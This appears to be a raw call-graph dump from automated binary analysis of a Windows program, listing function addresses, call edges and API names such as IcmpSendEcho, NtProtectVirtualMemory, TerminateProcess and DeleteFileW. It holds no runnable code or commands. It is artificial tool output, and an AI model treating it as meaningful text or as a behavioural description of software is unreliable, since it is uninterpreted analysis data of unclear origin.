102660->102658 102662 f67837 102660->102662 102660->102663 102664 f6766b 102660->102664 102673 f2e322 8 API calls ISource 102660->102673 102662->102663 102674 f3d2d5 39 API calls 102662->102674 102663->102628 102672 f3d2d5 39 API calls 102664->102672 102667->102628 102668->102648 102669->102642 102670->102642 102671->102642 102672->102664 102673->102660 102674->102663 102675->102663 102676 f1f4dc 102679 f1cab0 102676->102679 102680 f1cacb 102679->102680 102681 f614be 102680->102681 102682 f6150c 102680->102682 102709 f1caf0 102680->102709 102685 f614c8 102681->102685 102687 f614d5 102681->102687 102681->102709 102728 f962ff 206 API calls 2 library calls 102682->102728 102726 f96790 206 API calls 102685->102726 102702 f1cdc0 102687->102702 102727 f96c2d 206 API calls 2 library calls 102687->102727 102692 f1cf80 39 API calls 102692->102709 102693 f6179f 102693->102693 102694 f2e807 39 API calls 102694->102709 102696 f1cdee 102698 f616e8 102731 f96669 81 API calls 102698->102731 102702->102696 102732 f83fe1 81 API calls __wsopen_s 102702->102732 102706 f20340 206 API calls 102706->102709 102707 f1bed9 8 API calls 102707->102709 102709->102692 102709->102694 102709->102696 102709->102698 102709->102702 102709->102706 102709->102707 102710 f1be2d 102709->102710 102714 f2e7c1 39 API calls 102709->102714 102715 f2aa99 206 API calls 102709->102715 102716 f305b2 5 API calls __Init_thread_wait 102709->102716 102717 f2bc58 102709->102717 102722 f30413 29 API calls __onexit 102709->102722 102723 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102709->102723 102724 f2f4df 81 API calls 102709->102724 102725 f2f346 206 API calls 102709->102725 102729 f1b4c8 8 API calls 102709->102729 102730 f6ffaf 8 API calls 102709->102730 102711 f1be38 102710->102711 102712 f1be67 102711->102712 102733 f1bfa5 39 API calls 102711->102733 102712->102709 102714->102709 102715->102709 102716->102709 102718 f3014b 8 API calls 102717->102718 102719 f2bc65 102718->102719 102720 f1b329 8 API calls 102719->102720 102721 f2bc70 102720->102721 102721->102709 102722->102709 102723->102709 102724->102709 102725->102709 102726->102687 102727->102702 102728->102709 102729->102709 102730->102709 102731->102702 102732->102693 102733->102712 102734 f20ebf 102735 f20ed3 102734->102735 102741 f21425 102734->102741 102736 f20ee5 102735->102736 102737 f3014b 8 API calls 102735->102737 102738 f6562c 102736->102738 102740 f20f3e 102736->102740 102827 f1b4c8 8 API calls 102736->102827 102737->102736 102828 f81b14 8 API calls 102738->102828 102759 f2049d ISource 102740->102759 102767 f22b20 102740->102767 102741->102736 102744 f1bed9 8 API calls 102741->102744 102744->102736 102745 f6632b 102832 f83fe1 81 API calls __wsopen_s 102745->102832 102746 f21e50 40 API calls 102766 f20376 ISource 102746->102766 102747 f21695 102753 f1bed9 8 API calls 102747->102753 102747->102759 102748 f3014b 8 API calls 102748->102766 102750 f1bed9 8 API calls 102750->102766 102751 f65cdb 102757 f1bed9 8 API calls 102751->102757 102751->102759 102752 f6625a 102831 f83fe1 81 API calls __wsopen_s 102752->102831 102753->102759 102757->102759 102758 f1bf73 8 API calls 102758->102766 102760 f305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102760->102766 102761 f30413 29 API calls pre_c_initialization 102761->102766 102762 f66115 102829 f83fe1 81 API calls __wsopen_s 102762->102829 102763 f20aae ISource 102830 f83fe1 81 API calls __wsopen_s 102763->102830 102765 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102765->102766 102766->102745 102766->102746 102766->102747 102766->102748 102766->102750 102766->102751 102766->102752 102766->102758 102766->102759 102766->102760 102766->102761 102766->102762 102766->102763 102766->102765 102826 f21990 206 API calls 2 library calls 102766->102826 102768 f22fc0 102767->102768 102769 f22b86 102767->102769 103039 f305b2 5 API calls __Init_thread_wait 102768->103039 102771 f22ba0 102769->102771 102772 f67bd8 102769->102772 102833 f23160 102771->102833 103002 f97af9 102772->103002 102775 f22fca 102778 f1b329 8 API calls 102775->102778 102784 f2300b 102775->102784 102777 f67be4 102777->102766 102787 f22fe4 102778->102787 102779 f23160 9 API calls 102780 f22bc6 102779->102780 102781 f22bfc 102780->102781 102780->102784 102783 f67bfd 102781->102783 102807 f22c18 __fread_nolock 102781->102807 102782 f67bed 102782->102766 103044 f83fe1 81 API calls __wsopen_s 102783->103044 102784->102782 103041 f1b4c8 8 API calls 102784->103041 103040 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102787->103040 102788 f23049 103042 f2e6e8 206 API calls 102788->103042 102791 f67c15 103045 f83fe1 81 API calls __wsopen_s 102791->103045 102793 f22d3f 102794 f67c78 102793->102794 102795 f22d4c 102793->102795 103047 f961a2 53 API calls _wcslen 102794->103047 102796 f23160 9 API calls 102795->102796 102798 f22d59 102796->102798 102802 f23160 9 API calls 102798->102802 102813 f22dd7 ISource 102798->102813 102799 f3014b 8 API calls 102799->102807 102800 f3017b 8 API calls 102800->102807 102801 f23082 103043 f2fe39 8 API calls 102801->103043 102811 f22d73 102802->102811 102804 f22f2d 102804->102766 102806 f20340 206 API calls 102806->102807 102807->102788 102807->102791 102807->102793 102807->102799 102807->102800 102807->102806 102808 f67c59 102807->102808 102807->102813 103046 f83fe1 81 API calls __wsopen_s 102808->103046 102809 f23160 9 API calls 102809->102813 102811->102813 102815 f1bed9 8 API calls 102811->102815 102813->102801 102813->102809 102814 f22e8b ISource 102813->102814 102843 f90fb8 102813->102843 102868 f2ac3e 102813->102868 102887 f99fe8 102813->102887 102890 f8664c 102813->102890 102897 f9a6aa 102813->102897 102905 f9a9ac 102813->102905 102913 f99ffc 102813->102913 102916 f9a5b2 102813->102916 102922 f18bda 102813->102922 102997 f9ad47 102813->102997 103048 f83fe1 81 API calls __wsopen_s 102813->103048 102814->102804 103038 f2e322 8 API calls ISource 102814->103038 102815->102813 102826->102766 102827->102736 102828->102759 102829->102763 102830->102759 102831->102759 102832->102759 102834 f231a1 102833->102834 102839 f2317d 102833->102839 103049 f305b2 5 API calls __Init_thread_wait 102834->103049 102837 f231ab 102837->102839 103050 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102837->103050 102838 f29f47 102842 f22bb0 102838->102842 103052 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102838->103052 102839->102842 103051 f305b2 5 API calls __Init_thread_wait 102839->103051 102842->102779 102844 f90fe1 102843->102844 102845 f9100f WSAStartup 102844->102845 103089 f1c98d 102844->103089 102847 f91054 102845->102847 102858 f91023 ISource 102845->102858 103053 f2c1f6 102847->103053 102848 f90ffc 102848->102845 102851 f1c98d 39 API calls 102848->102851 102854 f9100b 102851->102854 102854->102845 102856 f91075 inet_addr gethostbyname 102857 f91093 IcmpCreateFile 102856->102857 102856->102858 102857->102858 102859 f910d3 102857->102859 102858->102813 102860 f3017b 8 API calls 102859->102860 102861 f910ec 102860->102861 102862 f1423c 8 API calls 102861->102862 102863 f910f7 102862->102863 102864 f9112b IcmpSendEcho 102863->102864 102865 f91102 IcmpSendEcho 102863->102865 102867 f9114c 102864->102867 102865->102867 102866 f91212 IcmpCloseHandle WSACleanup 102866->102858 102867->102866 102869 f18ec0 52 API calls 102868->102869 102870 f2ac68 102869->102870 102871 f2bc58 8 API calls 102870->102871 102872 f2ac7f 102871->102872 102873 f1c98d 39 API calls 102872->102873 102883 f2b09b _wcslen 102872->102883 102873->102883 102874 f2bbbe 43 API calls 102874->102883 102876 f17ad5 8 API calls 102876->102883 102879 f16c03 8 API calls 102879->102883 102880 f2b1fb 102880->102813 102881 f1c98d 39 API calls 102881->102883 102882 f18ec0 52 API calls 102882->102883 102883->102874 102883->102876 102883->102879 102883->102880 102883->102881 102883->102882 102884 f18577 8 API calls 102883->102884 102885 f1396b 60 API calls 102883->102885 102886 f13907 Shell_NotifyIconW 102883->102886 103101 f34d98 102883->103101 103111 f1ad40 8 API calls __fread_nolock 102883->103111 103112 f17b1a 8 API calls 102883->103112 102884->102883 102885->102883 102886->102883 103116 f989b6 102887->103116 102889 f99ff8 102889->102813 102891 f18ec0 52 API calls 102890->102891 102892 f86662 102891->102892 103242 f7dc54 102892->103242 102894 f8666a 102895 f8666e GetLastError 102894->102895 102896 f86683 102894->102896 102895->102896 102896->102813 102899 f9a705 102897->102899 102901 f9a6c5 102897->102901 102898 f9a723 102898->102901 102902 f1c98d 39 API calls 102898->102902 102903 f9a780 102898->102903 102899->102898 102900 f1c98d 39 API calls 102899->102900 102900->102898 102901->102813 102902->102903 103314 f80372 102903->103314 102906 f9aa08 102905->102906 102912 f9a9c8 102905->102912 102907 f9aa26 102906->102907 102908 f1c98d 39 API calls 102906->102908 102909 f1c98d 39 API calls 102907->102909 102910 f9aa8e 102907->102910 102907->102912 102908->102907 102909->102910 102911 f80372 58 API calls 102910->102911 102911->102912 102912->102813 102914 f989b6 119 API calls 102913->102914 102915 f9a00c 102914->102915 102915->102813 102918 f9a5c5 102916->102918 102917 f18ec0 52 API calls 102919 f9a632 102917->102919 102918->102917 102921 f9a5d4 102918->102921 103372 f818a9 102919->103372 102921->102813 102923 f18ec0 52 API calls 102922->102923 102924 f18bf9 102923->102924 102925 f18ec0 52 API calls 102924->102925 102926 f18c0e 102925->102926 102927 f18ec0 52 API calls 102926->102927 102928 f18c21 102927->102928 102929 f18ec0 52 API calls 102928->102929 102930 f18c37 102929->102930 102931 f17ad5 8 API calls 102930->102931 102932 f18c4b 102931->102932 102933 f56767 102932->102933 102934 f1c98d 39 API calls 102932->102934 102936 f17e12 8 API calls 102933->102936 102935 f18c72 102934->102935 102935->102933 102959 f18c98 try_get_first_available_module 102935->102959 102937 f56786 102936->102937 102938 f18470 8 API calls 102937->102938 102939 f56798 102938->102939 102942 f18a60 8 API calls 102939->102942 102969 f567bd 102939->102969 102940 f17e12 8 API calls 102943 f18d4e 102940->102943 102941 f18ec0 52 API calls 102945 f18d27 102941->102945 102942->102969 102946 f56873 102943->102946 102947 f18d5c 102943->102947 102944 f18d3c 102944->102940 102951 f18ec0 52 API calls 102945->102951 102949 f5687d 102946->102949 102950 f568bc 102946->102950 102952 f18d71 102947->102952 102953 f5696e 102947->102953 102955 f18470 8 API calls 102949->102955 102956 f18470 8 API calls 102950->102956 102951->102944 102957 f18470 8 API calls 102952->102957 102954 f18470 8 API calls 102953->102954 102960 f5697b 102954->102960 102961 f56885 102955->102961 102962 f568c5 102956->102962 102963 f18d79 102957->102963 102958 f1893c 8 API calls 102958->102969 102959->102941 102959->102944 102991 f18d91 try_get_first_available_module 102959->102991 102964 f18a60 8 API calls 102960->102964 102965 f18ec0 52 API calls 102961->102965 102966 f18a60 8 API calls 102962->102966 102967 f1bd57 8 API calls 102963->102967 102964->102991 102970 f56897 102965->102970 102971 f568e1 102966->102971 102967->102991 102968 f18a60 8 API calls 102968->102969 102969->102958 102969->102968 102995 f18e71 102969->102995 103428 f18844 8 API calls __fread_nolock 102969->103428 103429 f18844 8 API calls __fread_nolock 102970->103429 102975 f18ec0 52 API calls 102971->102975 102973 f568ab 102976 f1893c 8 API calls 102973->102976 102977 f568fc 102975->102977 102978 f568b9 102976->102978 103430 f18844 8 API calls __fread_nolock 102977->103430 102985 f18a60 8 API calls 102978->102985 102981 f569f1 102983 f1893c 8 API calls 102981->102983 102982 f569c1 102982->102981 102986 f569e5 102982->102986 102988 f569ff 102983->102988 102984 f56910 102989 f1893c 8 API calls 102984->102989 102985->102995 103431 f1ad40 8 API calls __fread_nolock 102986->103431 102992 f18a60 8 API calls 102988->102992 102989->102978 102991->102982 102991->102995 103413 f18844 8 API calls __fread_nolock 102991->103413 103414 f1893c 102991->103414 103417 f18a60 102991->103417 102994 f56a12 102992->102994 102993 f569ef 102996 f1bd57 8 API calls 102994->102996 102995->102813 102996->102993 102998 f18ec0 52 API calls 102997->102998 102999 f9ad63 102998->102999 103434 f7dd87 CreateToolhelp32Snapshot Process32FirstW 102999->103434 103001 f9ad72 103001->102813 103003 f97b38 103002->103003 103004 f97b52 103002->103004 103464 f83fe1 81 API calls __wsopen_s 103003->103464 103453 f960e6 103004->103453 103008 f20340 205 API calls 103009 f97bc1 103008->103009 103010 f97c5c 103009->103010 103013 f97b4a 103009->103013 103015 f97c03 103009->103015 103011 f97cb0 103010->103011 103012 f97c62 103010->103012 103011->103013 103014 f18ec0 52 API calls 103011->103014 103465 f81ad8 8 API calls 103012->103465 103013->102777 103016 f97cc2 103014->103016 103018 f8148b 8 API calls 103015->103018 103019 f1c2c9 8 API calls 103016->103019 103021 f97c3b 103018->103021 103022 f97ce6 CharUpperBuffW 103019->103022 103020 f97c85 103466 f1bd07 8 API calls 103020->103466 103024 f22b20 205 API calls 103021->103024 103025 f97d00 103022->103025 103024->103013 103026 f97d53 103025->103026 103028 f97d07 103025->103028 103027 f18ec0 52 API calls 103026->103027 103029 f97d5b 103027->103029 103460 f8148b 103028->103460 103467 f2aa65 9 API calls 103029->103467 103033 f22b20 205 API calls 103033->103013 103034 f97d65 103034->103013 103035 f18ec0 52 API calls 103034->103035 103036 f97d80 103035->103036 103468 f1bd07 8 API calls 103036->103468 103038->102814 103039->102775 103040->102784 103041->102788 103042->102801 103043->102801 103044->102813 103045->102813 103046->102813 103047->102811 103048->102813 103049->102837 103050->102839 103051->102838 103052->102842 103054 f3017b 8 API calls 103053->103054 103055 f2c209 103054->103055 103056 f3014b 8 API calls 103055->103056 103057 f2c215 103056->103057 103058 f18ec0 103057->103058 103059 f18ed2 103058->103059 103060 f18ed5 103058->103060 103081 f2f9d4 WideCharToMultiByte 103059->103081 103061 f18f0b 103060->103061 103062 f18edd 103060->103062 103064 f56b1f 103061->103064 103067 f18f1d 103061->103067 103072 f56a38 103061->103072 103094 f35536 26 API calls 103062->103094 103097 f354f3 26 API calls 103064->103097 103065 f18eed 103071 f3014b 8 API calls 103065->103071 103095 f2fe6f 51 API calls 103067->103095 103068 f56b37 103068->103068 103073 f18ef7 103071->103073 103075 f3017b 8 API calls 103072->103075 103080 f56ab1 103072->103080 103074 f1b329 8 API calls 103073->103074 103074->103059 103076 f56a81 103075->103076 103077 f3014b 8 API calls 103076->103077 103078 f56aa8 103077->103078 103079 f1b329 8 API calls 103078->103079 103079->103080 103096 f2fe6f 51 API calls 103080->103096 103082 f2fa35 103081->103082 103083 f2f9fe 103081->103083 103099 f2fe8a 8 API calls 103082->103099 103084 f3017b 8 API calls 103083->103084 103086 f2fa05 WideCharToMultiByte 103084->103086 103098 f2fa3e 8 API calls __fread_nolock 103086->103098 103088 f2fa29 103088->102856 103090 f1c99e 103089->103090 103091 f1c9a5 103089->103091 103090->103091 103100 f36641 39 API calls _strftime 103090->103100 103091->102848 103093 f1c9e8 103093->102848 103094->103065 103095->103065 103096->103064 103097->103068 103098->103088 103099->103088 103100->103093 103102 f34e1b 103101->103102 103103 f34da6 103101->103103 103115 f34e2d 40 API calls 4 library calls 103102->103115 103110 f34dcb 103103->103110 103113 f3f649 20 API calls __dosmaperr 103103->103113 103106 f34e28 103106->102883 103107 f34db2 103114 f42b5c 26 API calls __wsopen_s 103107->103114 103109 f34dbd 103109->102883 103110->102883 103111->102883 103112->102883 103113->103107 103114->103109 103115->103106 103117 f18ec0 52 API calls 103116->103117 103118 f989ed 103117->103118 103140 f98a32 ISource 103118->103140 103154 f99730 103118->103154 103120 f98cde 103121 f98eac 103120->103121 103125 f98cec 103120->103125 103204 f99941 59 API calls 103121->103204 103124 f98ebb 103124->103125 103126 f98ec7 103124->103126 103167 f988e3 103125->103167 103126->103140 103127 f18ec0 52 API calls 103144 f98aa6 103127->103144 103132 f98d25 103181 f2ffe0 103132->103181 103135 f98d5f 103189 f17e12 103135->103189 103136 f98d45 103188 f83fe1 81 API calls __wsopen_s 103136->103188 103139 f98d50 GetCurrentProcess TerminateProcess 103139->103135 103140->102889 103144->103120 103144->103127 103144->103140 103186 f74ad3 8 API calls __fread_nolock 103144->103186 103187 f98f7a 41 API calls _strftime 103144->103187 103146 f98f22 103146->103140 103149 f98f36 FreeLibrary 103146->103149 103147 f98d9e 103201 f995d8 74 API calls 103147->103201 103149->103140 103153 f98daf 103153->103146 103202 f21ca0 8 API calls 103153->103202 103203 f1b4c8 8 API calls 103153->103203 103205 f995d8 74 API calls 103153->103205 103155 f1c2c9 8 API calls 103154->103155 103156 f9974b CharLowerBuffW 103155->103156 103206 f79805 103156->103206 103160 f1bf73 8 API calls 103161 f99787 103160->103161 103213 f1acc0 103161->103213 103163 f9979b 103164 f1adf4 8 API calls 103163->103164 103166 f997a5 _wcslen 103164->103166 103165 f998bb _wcslen 103165->103144 103166->103165 103225 f98f7a 41 API calls _strftime 103166->103225 103168 f98949 103167->103168 103169 f988fe 103167->103169 103173 f99af3 103168->103173 103170 f3017b 8 API calls 103169->103170 103171 f98920 103170->103171 103171->103168 103172 f3014b 8 API calls 103171->103172 103172->103171 103174 f99d08 ISource 103173->103174 103179 f99b17 _strcat _wcslen ___std_exception_copy 103173->103179 103174->103132 103175 f1c98d 39 API calls 103175->103179 103176 f1c63f 39 API calls 103176->103179 103177 f1ca5b 39 API calls 103177->103179 103178 f18ec0 52 API calls 103178->103179 103179->103174 103179->103175 103179->103176 103179->103177 103179->103178 103229 f7f8c5 10 API calls _wcslen 103179->103229 103182 f2fff5 103181->103182 103183 f3008d NtProtectVirtualMemory 103182->103183 103184 f3007b CloseHandle 103182->103184 103185 f3005b 103182->103185 103183->103185 103184->103185 103185->103135 103185->103136 103186->103144 103187->103144 103188->103139 103190 f17e1a 103189->103190 103191 f3014b 8 API calls 103190->103191 103192 f17e28 103191->103192 103230 f18445 103192->103230 103195 f18470 103233 f1c760 103195->103233 103197 f18480 103198 f3017b 8 API calls 103197->103198 103199 f1851c 103197->103199 103198->103199 103199->103153 103200 f21ca0 8 API calls 103199->103200 103200->103147 103201->103153 103202->103153 103203->103153 103204->103124 103205->103153 103207 f79825 _wcslen 103206->103207 103208 f79914 103207->103208 103209 f7985a 103207->103209 103212 f79919 103207->103212 103208->103160 103208->103166 103209->103208 103226 f2e36b 41 API calls 103209->103226 103212->103208 103227 f2e36b 41 API calls 103212->103227 103214 f1accf 103213->103214 103216 f1ace1 103213->103216 103215 f1c2c9 8 API calls 103214->103215 103222 f1acda __fread_nolock 103214->103222 103217 f605a3 __fread_nolock 103215->103217 103216->103214 103218 f60557 103216->103218 103219 f1ad07 103216->103219 103221 f3014b 8 API calls 103218->103221 103228 f188e8 8 API calls 103219->103228 103223 f60561 103221->103223 103222->103163 103224 f3017b 8 API calls 103223->103224 103224->103214 103225->103165 103226->103209 103227->103212 103228->103222 103229->103179 103231 f3014b 8 API calls 103230->103231 103232 f17e30 103231->103232 103232->103195 103234 f1c76b 103233->103234 103235 f61285 103234->103235 103240 f1c773 ISource 103234->103240 103236 f3014b 8 API calls 103235->103236 103238 f61291 103236->103238 103237 f1c77a 103237->103197 103240->103237 103241 f1c7e0 8 API calls ISource 103240->103241 103241->103240 103243 f1bf73 8 API calls 103242->103243 103244 f7dc73 103243->103244 103245 f1bf73 8 API calls 103244->103245 103246 f7dc7c 103245->103246 103247 f1bf73 8 API calls 103246->103247 103248 f7dc85 103247->103248 103249 f15851 9 API calls 103248->103249 103250 f7dc90 103249->103250 103266 f7eab0 GetFileAttributesW 103250->103266 103253 f7dcab 103268 f1568e 103253->103268 103254 f16b7c 8 API calls 103254->103253 103256 f7dcbf FindFirstFileW 103257 f7dd4b FindClose 103256->103257 103260 f7dcde 103256->103260 103263 f7dd56 103257->103263 103258 f7dd26 FindNextFileW 103258->103260 103259 f1bed9 8 API calls 103259->103260 103260->103257 103260->103258 103260->103259 103261 f17bb5 8 API calls 103260->103261 103262 f16b7c 8 API calls 103260->103262 103261->103260 103264 f7dd17 DeleteFileW 103262->103264 103263->102894 103264->103258 103265 f7dd42 FindClose 103264->103265 103265->103263 103267 f7dc99 103266->103267 103267->103253 103267->103254 103269 f1bf73 8 API calls 103268->103269 103270 f156a4 103269->103270 103271 f1bf73 8 API calls 103270->103271 103272 f156ac 103271->103272 103273 f1bf73 8 API calls 103272->103273 103274 f156b4 103273->103274 103275 f1bf73 8 API calls 103274->103275 103276 f156bc 103275->103276 103277 f156f0 103276->103277 103278 f54da1 103276->103278 103280 f1acc0 8 API calls 103277->103280 103279 f1bed9 8 API calls 103278->103279 103281 f54daa 103279->103281 103282 f156fe 103280->103282 103283 f1bd57 8 API calls 103281->103283 103284 f1adf4 8 API calls 103282->103284 103287 f15733 103283->103287 103285 f15708 103284->103285 103285->103287 103288 f1acc0 8 API calls 103285->103288 103286 f15778 103290 f1acc0 8 API calls 103286->103290 103287->103286 103289 f15754 103287->103289 103305 f54dcc 103287->103305 103291 f15729 103288->103291 103289->103286 103310 f1655e 103289->103310 103292 f15789 103290->103292 103293 f1adf4 8 API calls 103291->103293 103295 f1579f 103292->103295 103299 f1bed9 8 API calls 103292->103299 103293->103287 103296 f157b3 103295->103296 103301 f1bed9 8 API calls 103295->103301 103300 f157be 103296->103300 103303 f1bed9 8 API calls 103296->103303 103298 f18577 8 API calls 103307 f54e8c 103298->103307 103299->103295 103304 f1bed9 8 API calls 103300->103304 103308 f157c9 103300->103308 103301->103296 103302 f1acc0 8 API calls 103302->103286 103303->103300 103304->103308 103305->103298 103306 f1655e 8 API calls 103306->103307 103307->103286 103307->103306 103313 f1ad40 8 API calls __fread_nolock 103307->103313 103308->103256 103311 f1c2c9 8 API calls 103310->103311 103312 f15761 103311->103312 103312->103286 103312->103302 103313->103307 103346 f802aa 103314->103346 103317 f8040b 103320 f80471 103317->103320 103328 f8041b 103317->103328 103318 f803f3 103362 f805e9 56 API calls __fread_nolock 103318->103362 103321 f804a1 103320->103321 103322 f80507 103320->103322 103338 f80399 __fread_nolock 103320->103338 103323 f804d1 103321->103323 103324 f804a6 103321->103324 103325 f805b0 103322->103325 103326 f80510 103322->103326 103323->103338 103367 f1ca5b 39 API calls 103323->103367 103324->103338 103366 f1ca5b 39 API calls 103324->103366 103325->103338 103371 f1c63f 39 API calls 103325->103371 103329 f8058d 103326->103329 103330 f80515 103326->103330 103327 f80453 103353 f81844 103327->103353 103328->103327 103363 f82855 10 API calls 103328->103363 103329->103338 103370 f1c63f 39 API calls 103329->103370 103335 f8051b 103330->103335 103336 f80554 103330->103336 103335->103338 103368 f1c63f 39 API calls 103335->103368 103336->103338 103369 f1c63f 39 API calls 103336->103369 103338->102901 103342 f80427 103364 f82855 10 API calls 103342->103364 103344 f8043e __fread_nolock 103365 f82855 10 API calls 103344->103365 103347 f802f7 103346->103347 103351 f802bb 103346->103351 103349 f1c98d 39 API calls 103347->103349 103348 f802f5 103348->103317 103348->103318 103348->103338 103349->103348 103350 f18ec0 52 API calls 103350->103351 103351->103348 103351->103350 103352 f34d98 _strftime 40 API calls 103351->103352 103352->103351 103354 f8184f 103353->103354 103355 f3014b 8 API calls 103354->103355 103356 f81856 103355->103356 103357 f81862 103356->103357 103358 f81883 103356->103358 103359 f3017b 8 API calls 103357->103359 103360 f3017b 8 API calls 103358->103360 103361 f8186b ___scrt_fastfail 103359->103361 103360->103361 103361->103338 103362->103338 103363->103342 103364->103344 103365->103327 103366->103338 103367->103338 103368->103338 103369->103338 103370->103338 103371->103338 103373 f818b6 103372->103373 103374 f3014b 8 API calls 103373->103374 103375 f818bd 103374->103375 103378 f7fcb5 103375->103378 103377 f818f7 103377->102921 103379 f1c2c9 8 API calls 103378->103379 103380 f7fcc8 CharLowerBuffW 103379->103380 103383 f7fcdb 103380->103383 103381 f1655e 8 API calls 103381->103383 103382 f7fce5 ___scrt_fastfail 103382->103377 103383->103381 103383->103382 103384 f7fd19 103383->103384 103385 f7fd2b 103384->103385 103386 f1655e 8 API calls 103384->103386 103387 f3017b 8 API calls 103385->103387 103386->103385 103391 f7fd59 103387->103391 103388 f7fd7b 103396 f7fe0c 103388->103396 103391->103388 103411 f7fbed 8 API calls 103391->103411 103392 f7fdb8 103392->103382 103393 f3014b 8 API calls 103392->103393 103394 f7fdd2 103393->103394 103395 f3017b 8 API calls 103394->103395 103395->103382 103397 f1bf73 8 API calls 103396->103397 103398 f7fe3e 103397->103398 103399 f1bf73 8 API calls 103398->103399 103400 f7fe47 103399->103400 103401 f1bf73 8 API calls 103400->103401 103404 f7fe50 103401->103404 103402 f18577 8 API calls 103402->103404 103403 f80114 103403->103392 103404->103402 103404->103403 103405 f366f8 GetStringTypeW 103404->103405 103407 f36641 39 API calls 103404->103407 103408 f7fe0c 40 API calls 103404->103408 103409 f1ad40 8 API calls 103404->103409 103410 f1bed9 8 API calls 103404->103410 103412 f36722 GetStringTypeW _strftime 103404->103412 103405->103404 103407->103404 103408->103404 103409->103404 103410->103404 103411->103391 103412->103404 103413->102991 103415 f3014b 8 API calls 103414->103415 103416 f1894a 103415->103416 103416->102991 103418 f18a76 103417->103418 103419 f56737 103418->103419 103425 f18a80 103418->103425 103432 f2b7a2 8 API calls 103419->103432 103421 f56744 103433 f1b4c8 8 API calls 103421->103433 103423 f56762 103423->103423 103424 f18b94 103426 f3014b 8 API calls 103424->103426 103425->103421 103425->103424 103427 f18b9b 103425->103427 103426->103427 103427->102991 103428->102969 103429->102973 103430->102984 103431->102993 103432->103421 103433->103423 103444 f7e80e 103434->103444 103436 f7de86 CloseHandle 103436->103001 103437 f7ddd4 Process32NextW 103437->103436 103438 f7ddcd 103437->103438 103438->103436 103438->103437 103439 f1bf73 8 API calls 103438->103439 103440 f1b329 8 API calls 103438->103440 103441 f1568e 8 API calls 103438->103441 103442 f17bb5 8 API calls 103438->103442 103450 f2e36b 41 API calls 103438->103450 103439->103438 103440->103438 103441->103438 103442->103438 103445 f7e819 103444->103445 103446 f7e830 103445->103446 103449 f7e836 103445->103449 103451 f36722 GetStringTypeW _strftime 103445->103451 103452 f3666b 39 API calls _strftime 103446->103452 103449->103438 103450->103438 103451->103445 103452->103449 103454 f96101 103453->103454 103455 f9614f 103453->103455 103456 f3017b 8 API calls 103454->103456 103455->103008 103458 f96123 103456->103458 103457 f3014b 8 API calls 103457->103458 103458->103455 103458->103457 103469 f81400 8 API calls 103458->103469 103461 f81499 103460->103461 103463 f814d2 103460->103463 103462 f3014b 8 API calls 103461->103462 103461->103463 103462->103463 103463->103033 103464->103013 103465->103020 103466->103013 103467->103034 103468->103013 103469->103458 103470 f4947a 103471 f49487 103470->103471 103474 f4949f 103470->103474 103527 f3f649 20 API calls __dosmaperr 103471->103527 103473 f4948c 103528 f42b5c 26 API calls __wsopen_s 103473->103528 103476 f494fa 103474->103476 103484 f49497 103474->103484 103529 f50144 21 API calls 2 library calls 103474->103529 103490 f3dcc5 103476->103490 103479 f49512 103497 f48fb2 103479->103497 103481 f49519 103482 f3dcc5 __fread_nolock 26 API calls 103481->103482 103481->103484 103483 f49545 103482->103483 103483->103484 103485 f3dcc5 __fread_nolock 26 API calls 103483->103485 103486 f49553 103485->103486 103486->103484 103487 f3dcc5 __fread_nolock 26 API calls 103486->103487 103488 f49563 103487->103488 103489 f3dcc5 __fread_nolock 26 API calls 103488->103489 103489->103484 103491 f3dcd1 103490->103491 103492 f3dce6 103490->103492 103530 f3f649 20 API calls __dosmaperr 103491->103530 103492->103479 103494 f3dcd6 103531 f42b5c 26 API calls __wsopen_s 103494->103531 103496 f3dce1 103496->103479 103498 f48fbe ___BuildCatchObject 103497->103498 103499 f48fc6 103498->103499 103500 f48fde 103498->103500 103598 f3f636 20 API calls __dosmaperr 103499->103598 103502 f490a4 103500->103502 103507 f49017 103500->103507 103605 f3f636 20 API calls __dosmaperr 103502->103605 103504 f48fcb 103599 f3f649 20 API calls __dosmaperr 103504->103599 103505 f490a9 103606 f3f649 20 API calls __dosmaperr 103505->103606 103509 f49026 103507->103509 103510 f4903b 103507->103510 103600 f3f636 20 API calls __dosmaperr 103509->103600 103532 f454ba EnterCriticalSection 103510->103532 103513 f49033 103607 f42b5c 26 API calls __wsopen_s 103513->103607 103514 f4902b 103601 f3f649 20 API calls __dosmaperr 103514->103601 103515 f49041 103517 f49072 103515->103517 103518 f4905d 103515->103518 103533 f490c5 103517->103533 103602 f3f649 20 API calls __dosmaperr 103518->103602 103520 f48fd3 __wsopen_s 103520->103481 103523 f49062 103603 f3f636 20 API calls __dosmaperr 103523->103603 103524 f4906d 103604 f4909c LeaveCriticalSection __wsopen_s 103524->103604 103527->103473 103528->103484 103529->103476 103530->103494 103531->103496 103532->103515 103534 f490d7 103533->103534 103535 f490ef 103533->103535 103624 f3f636 20 API calls __dosmaperr 103534->103624 103537 f49459 103535->103537 103542 f49134 103535->103542 103647 f3f636 20 API calls __dosmaperr 103537->103647 103538 f490dc 103625 f3f649 20 API calls __dosmaperr 103538->103625 103541 f4945e 103648 f3f649 20 API calls __dosmaperr 103541->103648 103544 f4913f 103542->103544 103545 f490e4 103542->103545 103550 f4916f 103542->103550 103626 f3f636 20 API calls __dosmaperr 103544->103626 103545->103524 103546 f4914c 103649 f42b5c 26 API calls __wsopen_s 103546->103649 103548 f49144 103627 f3f649 20 API calls __dosmaperr 103548->103627 103552 f49188 103550->103552 103553 f491ae 103550->103553 103554 f491ca 103550->103554 103552->103553 103558 f49195 103552->103558 103628 f3f636 20 API calls __dosmaperr 103553->103628 103608 f43b93 103554->103608 103557 f491b3 103629 f3f649 20 API calls __dosmaperr 103557->103629 103615 f4fc1b 103558->103615 103563 f49333 103565 f493a9 103563->103565 103568 f4934c GetConsoleMode 103563->103568 103564 f491ba 103630 f42b5c 26 API calls __wsopen_s 103564->103630 103570 f493ad ReadFile 103565->103570 103567 f491ea 103569 f42d38 _free 20 API calls 103567->103569 103568->103565 103571 f4935d 103568->103571 103572 f491f1 103569->103572 103573 f493c7 103570->103573 103574 f49421 GetLastError 103570->103574 103571->103570 103576 f49363 ReadConsoleW 103571->103576 103577 f49216 103572->103577 103578 f491fb 103572->103578 